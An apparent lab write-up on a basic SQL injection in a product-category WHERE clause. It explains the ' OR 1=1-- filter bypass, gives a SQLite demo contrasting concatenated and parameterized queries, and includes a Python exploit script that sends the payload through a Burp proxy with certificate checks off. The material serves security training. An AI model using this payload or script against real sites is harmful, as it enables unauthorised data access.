In this lab, I learned how a basic SQL injection vulnerability in a WHERE clause can be abused to bypass filters and retrieve hidden or restricted content. By injecting an always-true condition like ' OR 1=1--, I was able to trick the SQL engine into returning all rows from the product database, regardless of the original query. This is one of the most fundamental SQLi techniques, and it's eye-opening how something this simple can completely break application logic if input validation is missing.
[+] Start Burp Suite before running the script: it routes every request through the Burp proxy for visibility.
[+] The lab uses a category parameter in the URL to filter products.
[+] This parameter is directly used in a SQL WHERE clause.
[+] The application does not sanitize the input properly.
[+] An SQL injection payload is added to bypass the filter condition.
[+] The payload forces the condition to always be true.
[+] As a result, the server returns all product entries from the database.
[+] The script checks for a known product name in the response to confirm success.
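To make the mechanism in the list above concrete, here is an added example (not the lab's code and not part of the original writeup) that builds a constructed in-memory SQLite product table, runs the same category filter in both a string-concatenated form and a parameterized form, and shows why the ' OR 1=1-- payload returns every row from the first but nothing unexpected from the second. The table contents, the products table schema and the function names are assumptions made for this demonstration; the "released" column stands in for whatever hidden-row condition a real application appends to its WHERE clause.

```python
import sqlite3
import urllib.parse

# Constructed sample catalogue (not the lab's data). Rows with released = 0
# are hidden and must never be returned by the category filter.
PRODUCTS = [
    ("Folding Gadgets", "Gifts", 1),
    ("Giant Pillow Thing", "Gifts", 0),
    ("Eco Boat", "Lifestyle", 1),
]


def make_db():
    """Create an in-memory database holding the constructed catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (name TEXT, category TEXT, released INTEGER)"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def decode_query_param(raw):
    """Show what the server sees after URL decoding: '+' becomes a space."""
    return urllib.parse.unquote_plus(raw)


def filter_vulnerable(conn, category):
    """Mirror the lab's flaw: the category value is spliced into SQL text.

    With category = "' OR 1=1--" the statement becomes
        SELECT name FROM products WHERE category = '' OR 1=1--' AND released = 1
    so the hidden-row condition is commented out and every row comes back.
    """
    sql = (
        "SELECT name FROM products WHERE category = '%s' AND released = 1"
        % category
    )
    return [row[0] for row in conn.execute(sql)]


def filter_parameterized(conn, category):
    """Hardened form: the value is bound as a parameter, never parsed as SQL.

    The same payload is compared literally against the category column and
    matches nothing, so the released = 1 condition always stays in force.
    """
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]


if __name__ == "__main__":
    conn = make_db()
    payload = decode_query_param("'+OR+1=1--")
    print("server-side payload:", payload)
    print("vulnerable, Gifts:     ", filter_vulnerable(conn, "Gifts"))
    print("vulnerable, payload:   ", filter_vulnerable(conn, payload))
    print("parameterized, Gifts:  ", filter_parameterized(conn, "Gifts"))
    print("parameterized, payload:", filter_parameterized(conn, payload))
```

The vulnerable function is the one to look for in a code review: any query assembled with string formatting or concatenation from request data has this shape. The parameterized version is the fix; in SQLite the `--` comment and the `OR 1=1` are simply characters inside a bound string, which is why the filter condition survives.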
Note: You may need to update the product name "Folding Gadgets" in the script, depending on what appears in your specific lab.
python3 exploit.py https://<your-lab-id>.web-security-academy.net
import requests
import sys
import urllib3

# The lab uses a certificate the proxy cannot validate, so certificate warnings are silenced
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Route every request through Burp Suite so the exchange shows up in the proxy history
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}


def exploit_sqli(url, payload):
    # The category parameter is the value that ends up inside the SQL WHERE clause
    uri = '/filter?category='
    r = requests.get(url + uri + payload, verify=False, proxies=proxies)
    # A known product name in the response confirms the filter was bypassed;
    # change this name to match what your own lab instance returns
    return "Folding Gadgets" in r.text


if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        # '+' is the URL encoding of a space, so the server receives ' OR 1=1--
        payload = "'+OR+1=1--"
    except IndexError:
        print("[-] Usage: %s <url>" % sys.argv[0])
        print("[-] Example: %s https://www.example.com" % sys.argv[0])
        sys.exit(-1)

    if exploit_sqli(url, payload):
        print("[+] SQL injection successful!")
    else:
        print("[-] SQL injection unsuccessful")